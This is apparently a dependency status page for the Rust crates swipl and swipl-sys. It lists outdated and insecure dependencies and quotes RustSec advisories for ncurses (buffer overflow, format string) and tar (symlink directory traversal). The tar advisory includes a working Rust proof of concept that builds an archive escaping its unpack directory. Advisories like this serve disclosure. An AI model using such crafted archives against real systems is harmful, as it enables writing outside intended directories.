This project contains known security vulnerabilities. Find detailed information at the bottom.

Crate swipl

Dependencies

(3 total, all up-to-date)

CrateRequiredLatestStatus
 failure^0.1.10.1.8up to date
 failure_derive^0.1.10.1.8up to date
 lazy_static^1.0.01.5.0up to date

Crate swipl-sys

Dependencies

(2 total, 1 outdated, 1 insecure)

CrateRequiredLatestStatus
 gmp-mpfr-sys^1.1.01.6.4up to date
 ncurses ⚠️^5.91.06.0.1insecure

Build dependencies

(6 total, 3 outdated, 1 possibly insecure)

CrateRequiredLatestStatus
 bindgen^0.33.10.70.1out of date
 flate2^1.0.11.0.35up to date
 hashwriter^0.1.00.1.0up to date
 reqwest^0.8.50.12.9out of date
 sha2^0.7.00.10.8out of date
 tar ⚠️^0.4.140.4.43maybe insecure

Security Vulnerabilities

ncurses: Buffer overflow and format vulnerabilities in functions exposed without unsafe

RUSTSEC-2019-0006

ncurses exposes functions from the ncurses library which:

  • Pass buffers without length to C functions that may write an arbitrary amount of data, leading to a buffer overflow. (instr, mvwinstr, etc)
  • Passes rust &str to strings expecting C format arguments, allowing hostile input to execute a format string attack, which trivially allows writing arbitrary data to stack memory (functions in the printw family).

tar: Links in archive can create arbitrary directories

RUSTSEC-2021-0080

When unpacking a tarball that contains a symlink the tar crate may create directories outside of the directory it's supposed to unpack into.

The function errors when it's trying to create a file, but the folders are already created at this point.

use std::{io, io::Result};
use tar::{Archive, Builder, EntryType, Header};

fn main() -> Result<()> {
    let mut buf = Vec::new();

    {
        let mut builder = Builder::new(&mut buf);

        // symlink: parent -> ..
        let mut header = Header::new_gnu();
        header.set_path("symlink")?;
        header.set_link_name("..")?;
        header.set_entry_type(EntryType::Symlink);
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        // file: symlink/exploit/foo/bar
        let mut header = Header::new_gnu();
        header.set_path("symlink/exploit/foo/bar")?;
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        builder.finish()?;
    };

    Archive::new(&*buf).unpack("demo")
}

This has been fixed in https://github.com/alexcrichton/tar-rs/pull/259 and is published as tar 0.4.36. Thanks to Martin Michaelis (@mgjm) for discovering and reporting this, and Nikhil Benesch (@benesch) for the fix!